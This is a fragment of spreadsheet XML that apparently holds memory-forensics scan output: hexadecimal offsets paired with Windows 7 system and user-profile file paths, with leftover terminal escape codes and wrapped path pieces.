    <t>\Windows\System32\DriverStore\FileRepository\gameport.inf_x86_neutral_fe5c4f29488f121e\gamepor</t>
  </si>
  <si>
    <t>0xded66790</t>
  </si>
  <si>
    <t>0xded67730</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\desk.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded67918</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmracal.inf_x86_neutral_b5b12e793f94f3f8\mdmraca</t>
  </si>
  <si>
    <t>0xded67ad8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00d.inf_x86_neutral_8883e3ab4a33bfbb\prnca00</t>
  </si>
  <si>
    <t>0xded67f80</t>
  </si>
  <si>
    <t>\Windows\System32\dpx.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded68828</t>
  </si>
  <si>
    <t>CbsCore.dll</t>
  </si>
  <si>
    <t>0xded68dc8</t>
  </si>
  <si>
    <t>0xded68eb8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msctf.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded695e0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xded697c8</t>
  </si>
  <si>
    <t>\Windows\System32\aeevts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded69960</t>
  </si>
  <si>
    <t>0xded69c60</t>
  </si>
  <si>
    <t>wcp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>_x001B_[46G</t>
  </si>
  <si>
    <t>0xded69ec8</t>
  </si>
  <si>
    <t>\Windows\System32\ktmw32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded69f80</t>
  </si>
  <si>
    <t>\Windows\System32\uxsms.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded6a038</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-</t>
  </si>
  <si>
    <t>Assistant.evt</t>
  </si>
  <si>
    <t>0xded6a128</t>
  </si>
  <si>
    <t>\Windows\System32\nsisvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded6ad50</t>
  </si>
  <si>
    <t>0xded6ae50</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\lltdio.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xded6c200</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_pnrpsvc_3932681b8fb41c9d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded6c778</t>
  </si>
  <si>
    <t>\Windows\System32\httpapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded70028</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tcpipreg.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xded720b0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\srvnet.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xded723d0</t>
  </si>
  <si>
    <t>\Windows\System32\sppc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded74450</t>
  </si>
  <si>
    <t>\Windows\System32\mcupdate_GenuineIntel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded747a0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\pci.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xded75038</t>
  </si>
  <si>
    <t>\Windows\System32\nrpsrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded75648</t>
  </si>
  <si>
    <t>0xded758d8</t>
  </si>
  <si>
    <t>0xded75990</t>
  </si>
  <si>
    <t>0xded76038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD87408</t>
  </si>
  <si>
    <t>8F3328_6B3C86</t>
  </si>
  <si>
    <t>056F9AA33BF</t>
  </si>
  <si>
    <t>BA8EF3</t>
  </si>
  <si>
    <t>5E4D23D14_x001B_[0K</t>
  </si>
  <si>
    <t>0xded763c8</t>
  </si>
  <si>
    <t>0xded76518</t>
  </si>
  <si>
    <t>0xded76900</t>
  </si>
  <si>
    <t>0xded76c30</t>
  </si>
  <si>
    <t>0xded76ce8</t>
  </si>
  <si>
    <t>0xded773c8</t>
  </si>
  <si>
    <t>0xded777b0</t>
  </si>
  <si>
    <t>0xded77918</t>
  </si>
  <si>
    <t>0xded779d0</t>
  </si>
  <si>
    <t>0xded784b0</t>
  </si>
  <si>
    <t>0xded78a38</t>
  </si>
  <si>
    <t>0xded79360</t>
  </si>
  <si>
    <t>0xded79690</t>
  </si>
  <si>
    <t>0xded79748</t>
  </si>
  <si>
    <t>0xded79b30</t>
  </si>
  <si>
    <t>0xded79df8</t>
  </si>
  <si>
    <t>0xded79f18</t>
  </si>
  <si>
    <t>0xded7a3a0</t>
  </si>
  <si>
    <t>0xded7a458</t>
  </si>
  <si>
    <t>0xded7a840</t>
  </si>
  <si>
    <t>0xded7aac0</t>
  </si>
  <si>
    <t>0xded7ab78</t>
  </si>
  <si>
    <t>0xded7af80</t>
  </si>
  <si>
    <t>0xded7b270</t>
  </si>
  <si>
    <t>0xded7b630</t>
  </si>
  <si>
    <t>0xded7b6e8</t>
  </si>
  <si>
    <t>0xded7ba68</t>
  </si>
  <si>
    <t>0xded7be50</t>
  </si>
  <si>
    <t>0xded7c298</t>
  </si>
  <si>
    <t>0xded7c5c8</t>
  </si>
  <si>
    <t>0xded7c680</t>
  </si>
  <si>
    <t>0xded7ca78</t>
  </si>
  <si>
    <t>0xded7cb30</t>
  </si>
  <si>
    <t>0xded7cf18</t>
  </si>
  <si>
    <t>0xded7d038</t>
  </si>
  <si>
    <t>0xded7d460</t>
  </si>
  <si>
    <t>0xded7d518</t>
  </si>
  <si>
    <t>0xded7d900</t>
  </si>
  <si>
    <t>0xded7dbc8</t>
  </si>
  <si>
    <t>0xded7dce8</t>
  </si>
  <si>
    <t>0xded7df80</t>
  </si>
  <si>
    <t>0xded7e038</t>
  </si>
  <si>
    <t>\System Volume Information\SPP\SppGroupCache\{EBCD2161-388F-42B5-B0D8-5A088EAB7FE6}_WindowsUpd</t>
  </si>
  <si>
    <t>ateInfo_x001B_[0K</t>
  </si>
  <si>
    <t>0xded7e428</t>
  </si>
  <si>
    <t>0xded7e710</t>
  </si>
  <si>
    <t>0xded7e7c8</t>
  </si>
  <si>
    <t>0xded7e918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138612_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K_x001B_[3</t>
  </si>
  <si>
    <t>6G</t>
  </si>
  <si>
    <t>0xded7e9f8</t>
  </si>
  <si>
    <t>0xded7f338</t>
  </si>
  <si>
    <t>0xded7f458</t>
  </si>
  <si>
    <t>0xded7f788</t>
  </si>
  <si>
    <t>0xded7f840</t>
  </si>
  <si>
    <t>0xded7fa88</t>
  </si>
  <si>
    <t>0xded7fc50</t>
  </si>
  <si>
    <t>0xded803e8</t>
  </si>
  <si>
    <t>0xded807c8</t>
  </si>
  <si>
    <t>0xded80880</t>
  </si>
  <si>
    <t>0xded80bc8</t>
  </si>
  <si>
    <t>0xded81038</t>
  </si>
  <si>
    <t>\System Volume Information\SPP\SppGroupCache\{EBCD2161-388F-42B5-B0D8-5A088EAB7FE6}_DriverPack</t>
  </si>
  <si>
    <t>ageInfo_x001B_[0K</t>
  </si>
  <si>
    <t>0xded812a0</t>
  </si>
  <si>
    <t>0xded815d0</t>
  </si>
  <si>
    <t>0xded81688</t>
  </si>
  <si>
    <t>0xded81a98</t>
  </si>
  <si>
    <t>0xded82740</t>
  </si>
  <si>
    <t>0xded82890</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\UsrClass.dat{355392d9-42d2-11e9-ba55-08002710b8</t>
  </si>
  <si>
    <t>d0}.TMContain</t>
  </si>
  <si>
    <t>er000000000</t>
  </si>
  <si>
    <t>00002.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded832e0</t>
  </si>
  <si>
    <t>\Windows\System32\vssapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded842e0</t>
  </si>
  <si>
    <t>0xded846c8</t>
  </si>
  <si>
    <t>0xded85038</t>
  </si>
  <si>
    <t>0xded85590</t>
  </si>
  <si>
    <t>0xded85770</t>
  </si>
  <si>
    <t>\Users\Support\Links\Downloads.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xded85c10</t>
  </si>
  <si>
    <t>\Windows\System32\Magnify.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded86758</t>
  </si>
  <si>
    <t>0xded872c0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8ECBD5625E1E150E7744A6B5129</t>
  </si>
  <si>
    <t>C3C29_95AE81E</t>
  </si>
  <si>
    <t>1723E64D6C0</t>
  </si>
  <si>
    <t>2AE394</t>
  </si>
  <si>
    <t>450B4CEA_x001B_[0K</t>
  </si>
  <si>
    <t>0xded88298</t>
  </si>
  <si>
    <t>0xded88680</t>
  </si>
  <si>
    <t>0xded88a68</t>
  </si>
  <si>
    <t>0xded88d98</t>
  </si>
  <si>
    <t>0xded88e50</t>
  </si>
  <si>
    <t>0xded89268</t>
  </si>
  <si>
    <t>0xded89650</t>
  </si>
  <si>
    <t>0xded89980</t>
  </si>
  <si>
    <t>0xded89a38</t>
  </si>
  <si>
    <t>0xded89e20</t>
  </si>
  <si>
    <t>0xded8a038</t>
  </si>
  <si>
    <t>\Windows\System32\config\DEFAULT_x001B_[0K</t>
  </si>
  <si>
    <t>0xded8a450</t>
  </si>
  <si>
    <t>\Windows\System32\hgcpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded8af30</t>
  </si>
  <si>
    <t>\Windows\System32\dfscli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded8b268</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Data.SqlXml\2e62d0e3d203e89427fe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded8c470</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Micro</t>
  </si>
  <si>
    <t>soft.CSharp.d</t>
  </si>
  <si>
    <t>0xded8ca48</t>
  </si>
  <si>
    <t>\Windows\System32\SearchFilterHost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded8cc98</t>
  </si>
  <si>
    <t>ctors.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xded8d038</t>
  </si>
  <si>
    <t>0xded8dec8</t>
  </si>
  <si>
    <t>0xded98f80</t>
  </si>
  <si>
    <t>0xded991d8</t>
  </si>
  <si>
    <t>\Windows\System32\fvecerts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded9a418</t>
  </si>
  <si>
    <t>\Windows\System32\tbs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded9a538</t>
  </si>
  <si>
    <t>\Windows\System32\fveapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded9ab20</t>
  </si>
  <si>
    <t>\Windows\System32\wiarpc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded9af80</t>
  </si>
  <si>
    <t>0xded9b4f8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\b4d5a05b-dcff-44ab-ae1b-f2108ca34106_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeda0038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationCFFRasterizer\3.0.0.0__31bf3856ad364e35\PresentationCFF</t>
  </si>
  <si>
    <t>Rasterizer.dl</t>
  </si>
  <si>
    <t>0xdeda0c28</t>
  </si>
  <si>
    <t>0xdeda1f80</t>
  </si>
  <si>
    <t>0xdeda2468</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\PresentationUI\148f09589f70f9f95f8e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeda2520</t>
  </si>
  <si>
    <t>\Windows\System32\dhcpcsvc6.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeda2f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationFramework.Royale\3.0.0.0__31bf3856ad364e35\Presentation</t>
  </si>
  <si>
    <t>Framework.Roy</t>
  </si>
  <si>
    <t>ale.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeda59f8</t>
  </si>
  <si>
    <t>\Windows\System32\NapiNSP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeda66d0</t>
  </si>
  <si>
    <t>0xdeda6938</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E9389</t>
  </si>
  <si>
    <t>2934B_C31B249</t>
  </si>
  <si>
    <t>8754E340573</t>
  </si>
  <si>
    <t>F1336D</t>
  </si>
  <si>
    <t>E607D619_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeda6c90</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\j</t>
  </si>
  <si>
    <t>query.mousewh</t>
  </si>
  <si>
    <t>eel[1].js_x001B_[</t>
  </si>
  <si>
    <t>0xdedaddd0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\etc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedbe1c8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx</t>
  </si>
  <si>
    <t>0xdedbf528</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationUI\3.0.0.0__31bf3856ad364e35\PresentationUI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedbf5e0</t>
  </si>
  <si>
    <t>0xdedbf698</t>
  </si>
  <si>
    <t>0xdedc2570</t>
  </si>
  <si>
    <t>\Windows\System32\setupapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc26c0</t>
  </si>
  <si>
    <t>0xdedc29c0</t>
  </si>
  <si>
    <t>\Windows\System32\d3d10_1core.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc41e0</t>
  </si>
  <si>
    <t>0xdedc46b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-EnterpriseEdition~31bf3856ad364e35~x86~~6.1.7601</t>
  </si>
  <si>
    <t>0xdedc49e0</t>
  </si>
  <si>
    <t>0xdedc4a98</t>
  </si>
  <si>
    <t>0xdedc4d60</t>
  </si>
  <si>
    <t>0xdedc4e18</t>
  </si>
  <si>
    <t>0xdedc4f18</t>
  </si>
  <si>
    <t>0xdedc5038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\f</t>
  </si>
  <si>
    <t>avicon[1].ico</t>
  </si>
  <si>
    <t>0xdedc51b0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6</t>
  </si>
  <si>
    <t>E1C7C_CE50F89</t>
  </si>
  <si>
    <t>3881D43DC0C</t>
  </si>
  <si>
    <t>815E4D</t>
  </si>
  <si>
    <t>80FAF2B4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc57a0</t>
  </si>
  <si>
    <t>8F3328_862BA1</t>
  </si>
  <si>
    <t>770B2FEE013</t>
  </si>
  <si>
    <t>603D2F</t>
  </si>
  <si>
    <t>F9ABEAFDA_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc5a68</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc6360</t>
  </si>
  <si>
    <t>\TSCLIENT\SCARD\2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc6518</t>
  </si>
  <si>
    <t>0xdedc6900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Foundation-Package~31bf3856ad364e35~x86~~6.1.760</t>
  </si>
  <si>
    <t>0xdedc6ce8</t>
  </si>
  <si>
    <t>0xdedc6f80</t>
  </si>
  <si>
    <t>0xdedc7908</t>
  </si>
  <si>
    <t>0xdedc7d60</t>
  </si>
  <si>
    <t>0xdedc82e8</t>
  </si>
  <si>
    <t>0xdedc83a0</t>
  </si>
  <si>
    <t>0xdedc8788</t>
  </si>
  <si>
    <t>0xdedc8c00</t>
  </si>
  <si>
    <t>0xdedc8f80</t>
  </si>
  <si>
    <t>0xdedc9920</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21253908F3CB05D51B1C2DA8B6</t>
  </si>
  <si>
    <t>81A785_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc99d8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2FE331B23AD5AD8807A3670A6E</t>
  </si>
  <si>
    <t>700403_1652D3</t>
  </si>
  <si>
    <t>F108FE83E60</t>
  </si>
  <si>
    <t>0188FA</t>
  </si>
  <si>
    <t>064BF0F63_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedc9b48</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WER\ReportArchive_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedca368</t>
  </si>
  <si>
    <t>0xdedca580</t>
  </si>
  <si>
    <t>0xdedca968</t>
  </si>
  <si>
    <t>0xdedcac98</t>
  </si>
  <si>
    <t>0xdedcad50</t>
  </si>
  <si>
    <t>0xdedcaf80</t>
  </si>
  <si>
    <t>0xdedcb590</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\EhStorShell.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcb740</t>
  </si>
  <si>
    <t>\Windows\System32\ie4uinit.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcbf08</t>
  </si>
  <si>
    <t>d5ba6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcc270</t>
  </si>
  <si>
    <t>0xdedcc658</t>
  </si>
  <si>
    <t>0xdedcca40</t>
  </si>
  <si>
    <t>0xdedcce18</t>
  </si>
  <si>
    <t>0xdedccf80</t>
  </si>
  <si>
    <t>0xdedcd0d8</t>
  </si>
  <si>
    <t>0xdedcd208</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\wmplayer.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcd418</t>
  </si>
  <si>
    <t>\Users\Support\Saved Games\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcd970</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcdd00</t>
  </si>
  <si>
    <t>0xdedcdec8</t>
  </si>
  <si>
    <t>st[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedcdf80</t>
  </si>
  <si>
    <t>0xdedce038</t>
  </si>
  <si>
    <t>0xdedce580</t>
  </si>
  <si>
    <t>0xdedce900</t>
  </si>
  <si>
    <t>0xdedcebc8</t>
  </si>
  <si>
    <t>0xdedcece8</t>
  </si>
  <si>
    <t>0xdedcef80</t>
  </si>
  <si>
    <t>0xdedcf278</t>
  </si>
  <si>
    <t>0xdedcf5a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3170735~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K_x001B_[100</t>
  </si>
  <si>
    <t>0xdedcf6c0</t>
  </si>
  <si>
    <t>0xdedd0280</t>
  </si>
  <si>
    <t>0xdedd0338</t>
  </si>
  <si>
    <t>0xdedd05c8</t>
  </si>
  <si>
    <t>0xdedd06e8</t>
  </si>
  <si>
    <t>0xdedd0b30</t>
  </si>
  <si>
    <t>0xdedd0df8</t>
  </si>
  <si>
    <t>0xdedd0f18</t>
  </si>
  <si>
    <t>0xdedd1280</t>
  </si>
  <si>
    <t>0xdedd13a0</t>
  </si>
  <si>
    <t>0xdedd15a0</t>
  </si>
  <si>
    <t>0xdedd1658</t>
  </si>
  <si>
    <t>0xdedd1a40</t>
  </si>
  <si>
    <t>0xdedd1c38</t>
  </si>
  <si>
    <t>0xdedd1d58</t>
  </si>
  <si>
    <t>0xdedd2038</t>
  </si>
  <si>
    <t>0xdedd23d0</t>
  </si>
  <si>
    <t>0xdedd2700</t>
  </si>
  <si>
    <t>0xdedd27b8</t>
  </si>
  <si>
    <t>0xdedd2b38</t>
  </si>
  <si>
    <t>0xdedd2e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2547666~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedd2eb8</t>
  </si>
  <si>
    <t>0xdedd3038</t>
  </si>
  <si>
    <t>0xdedd3110</t>
  </si>
  <si>
    <t>0xdedd3528</t>
  </si>
  <si>
    <t>0xdedd37f0</t>
  </si>
  <si>
    <t>0xdedd38a8</t>
  </si>
  <si>
    <t>0xdedd3b30</t>
  </si>
  <si>
    <t>0xdedd3df8</t>
  </si>
  <si>
    <t>0xdedd3f18</t>
  </si>
  <si>
    <t>0xdedd4038</t>
  </si>
  <si>
    <t>\Users\Public\Pictures\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdedd4220</t>
  </si>
  <si>
    <t>0xdedd49e0</t>
  </si>
  <si>
    <t>0xdedd4bb8</t>
  </si>
  <si>
    <t>0xdedd54f0</t>
  </si>
  <si>
    <t>0xdedd58d8</t>
  </si>
  <si>
    <t>0xdedd5ec8</t>
  </si>
  <si>
    <t>0xdedd5f80</t>
  </si>
  <si>
    <t>0xdedd6200</t>
  </si>
  <si>
    <t>0xdedd6388</t>
  </si>
  <si>
    <t>0xdedd6768</t>
  </si>
  <si>
    <t>0xdedd6a68</t>
  </si>
  <si>
    <t>0xdedd6be8</t>
  </si>
  <si>
    <t>0xdedd9218</t>
  </si>
  <si>
    <t>0xdedd9338</t>
  </si>
  <si>
    <t>0xdedd9720</t>
  </si>
  <si>
    <t>0xdedd9b08</t>
  </si>
  <si>
    <t>0xdedd9d68</t>
  </si>
  <si>
    <t>0xdedd9e20</t>
  </si>
  <si>
    <t>0xdedda360</t>
  </si>
  <si>
    <t>0xdedda628</t>
  </si>
  <si>
    <t>0xdedda748</t>
  </si>
  <si>
    <t>0xdeddab30</t>
  </si>
  <si>
    <t>0xdeddae60</t>
  </si>
  <si>
    <t>0xdeddaf18</t>
  </si>
  <si>
    <t>0xdeddb288</t>
  </si>
  <si>
    <t>0xdeddb3a8</t>
  </si>
  <si>
    <t>0xdeddb680</t>
  </si>
  <si>
    <t>0xdeddb948</t>
  </si>
  <si>
    <t>0xdeddba68</t>
  </si>
  <si>
    <t>0xdeddbe50</t>
  </si>
  <si>
    <t>0xdeddc360</t>
  </si>
  <si>
    <t>0xdeddc690</t>
  </si>
  <si>
    <t>0xdeddc748</t>
  </si>
  <si>
    <t>0xdeddca10</t>
  </si>
  <si>
    <t>0xdeddcb30</t>
  </si>
  <si>
    <t>0xdeddcf18</t>
  </si>
  <si>
    <t>0xdeddd338</t>
  </si>
  <si>
    <t>0xdeddd720</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2836942_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>0xdeddda38</t>
  </si>
  <si>
    <t>0xdeddddf8</t>
  </si>
  <si>
    <t>0xdedddf18</t>
  </si>
  <si>
    <t>0xdedde2a8</t>
  </si>
  <si>
    <t>0xdedde360</t>
  </si>
  <si>
    <t>0xdedde628</t>
  </si>
  <si>
    <t>0xdedde748</t>
  </si>
  <si>
    <t>0xdeddeb30</t>
  </si>
  <si>
    <t>0xdeddee60</t>
  </si>
  <si>
    <t>0xdeddef18</t>
  </si>
  <si>
    <t>0xdeddf038</t>
  </si>
  <si>
    <t>0xdeddf550</t>
  </si>
  <si>
    <t>0xdeddf938</t>
  </si>
  <si>
    <t>0xdeddfd20</t>
  </si>
  <si>
    <t>0xdede0170</t>
  </si>
  <si>
    <t>0xdede0600</t>
  </si>
  <si>
    <t>0xdede0720</t>
  </si>
  <si>
    <t>0xdede0918</t>
  </si>
  <si>
    <t>0xdede0a38</t>
  </si>
  <si>
    <t>0xdede0f18</t>
  </si>
  <si>
    <t>0xdede12e0</t>
  </si>
  <si>
    <t>0xdede1398</t>
  </si>
  <si>
    <t>0xdede14e8</t>
  </si>
  <si>
    <t>0xdede1818</t>
  </si>
  <si>
    <t>0xdede18d0</t>
  </si>
  <si>
    <t>0xdede1b98</t>
  </si>
  <si>
    <t>0xdede1cb8</t>
  </si>
  <si>
    <t>0xdede2270</t>
  </si>
  <si>
    <t>0xdede2538</t>
  </si>
  <si>
    <t>0xdede2658</t>
  </si>
  <si>
    <t>0xdede2800</t>
  </si>
  <si>
    <t>0xdede2900</t>
  </si>
  <si>
    <t>0xdede2e50</t>
  </si>
  <si>
    <t>0xdede3130</t>
  </si>
  <si>
    <t>0xdede3460</t>
  </si>
  <si>
    <t>0xdede3518</t>
  </si>
  <si>
    <t>0xdede3900</t>
  </si>
  <si>
    <t>0xdede3ce8</t>
  </si>
  <si>
    <t>0xdede44d8</t>
  </si>
  <si>
    <t>0xdede47a0</t>
  </si>
  <si>
    <t>0xdede48c0</t>
  </si>
  <si>
    <t>0xdede4aa8</t>
  </si>
  <si>
    <t>0xdede4b88</t>
  </si>
  <si>
    <t>0xdede4eb8</t>
  </si>
  <si>
    <t>0xdede5548</t>
  </si>
  <si>
    <t>0xdede5930</t>
  </si>
  <si>
    <t>0xdede5cb8</t>
  </si>
  <si>
    <t>0xdede5f18</t>
  </si>
  <si>
    <t>0xdede6038</t>
  </si>
  <si>
    <t>0xdede60f0</t>
  </si>
  <si>
    <t>0xdede61c8</t>
  </si>
  <si>
    <t>0xdede65a8</t>
  </si>
  <si>
    <t>0xdede68d8</t>
  </si>
  <si>
    <t>0xdede6990</t>
  </si>
  <si>
    <t>0xdede6ad0</t>
  </si>
  <si>
    <t>0xdede6eb8</t>
  </si>
  <si>
    <t>0xdede71b0</t>
  </si>
  <si>
    <t>0xdede7268</t>
  </si>
  <si>
    <t>0xdede7568</t>
  </si>
  <si>
    <t>0xdede7620</t>
  </si>
  <si>
    <t>0xdede78e8</t>
  </si>
  <si>
    <t>0xdede79a0</t>
  </si>
  <si>
    <t>0xdede7c00</t>
  </si>
  <si>
    <t>0xdede7ec8</t>
  </si>
  <si>
    <t>0xdede7f80</t>
  </si>
  <si>
    <t>0xdede8038</t>
  </si>
  <si>
    <t>0xdede80f8</t>
  </si>
  <si>
    <t>um_x001B_[0K_x001B_[135</t>
  </si>
  <si>
    <t>0xdede8380</t>
  </si>
  <si>
    <t>0xdede8438</t>
  </si>
  <si>
    <t>0xdede8820</t>
  </si>
  <si>
    <t>0xdede8aa0</t>
  </si>
  <si>
    <t>0xdede8d00</t>
  </si>
  <si>
    <t>0xdede8e20</t>
  </si>
  <si>
    <t>0xdede92a8</t>
  </si>
  <si>
    <t>0xdede9840</t>
  </si>
  <si>
    <t>0xdede99f0</t>
  </si>
  <si>
    <t>0xdede9c50</t>
  </si>
  <si>
    <t>0xdede9f80</t>
  </si>
  <si>
    <t>0xdedea038</t>
  </si>
  <si>
    <t>0xdedea558</t>
  </si>
  <si>
    <t>0xdedea9b0</t>
  </si>
  <si>
    <t>0xdedeaa68</t>
  </si>
  <si>
    <t>0xdedeae50</t>
  </si>
  <si>
    <t>0xdedeb3c8</t>
  </si>
  <si>
    <t>0xdedeb6f8</t>
  </si>
  <si>
    <t>0xdedeb7b0</t>
  </si>
  <si>
    <t>0xdedebb98</t>
  </si>
  <si>
    <t>0xdedebf80</t>
  </si>
  <si>
    <t>0xdedec038</t>
  </si>
  <si>
    <t>0xdedec1e0</t>
  </si>
  <si>
    <t>0xdedec630</t>
  </si>
  <si>
    <t>0xdedec6e8</t>
  </si>
  <si>
    <t>0xdedecad0</t>
  </si>
  <si>
    <t>0xdedeceb8</t>
  </si>
  <si>
    <t>0xdeded3c8</t>
  </si>
  <si>
    <t>0xdeded6f8</t>
  </si>
  <si>
    <t>0xdeded7b0</t>
  </si>
  <si>
    <t>0xdededae0</t>
  </si>
  <si>
    <t>0xdededb98</t>
  </si>
  <si>
    <t>0xdededf80</t>
  </si>
  <si>
    <t>0xdedee3a0</t>
  </si>
  <si>
    <t>0xdedee4e8</t>
  </si>
  <si>
    <t>0xdedee818</t>
  </si>
  <si>
    <t>0xdedeeae0</t>
  </si>
  <si>
    <t>0xdedeeb98</t>
  </si>
  <si>
    <t>0xdedeeec8</t>
  </si>
  <si>
    <t>0xdedeef80</t>
  </si>
  <si>
    <t>0xdedef310</t>
  </si>
  <si>
    <t>0xdedef3c8</t>
  </si>
  <si>
    <t>0xdedef7b0</t>
  </si>
  <si>
    <t>0xdedefb98</t>
  </si>
  <si>
    <t>0xdedefec8</t>
  </si>
  <si>
    <t>0xdedeff80</t>
  </si>
  <si>
    <t>0xdedf0038</t>
  </si>
  <si>
    <t>0xdedf01e0</t>
  </si>
  <si>
    <t>0xdedf0690</t>
  </si>
  <si>
    <t>0xdedf0748</t>
  </si>
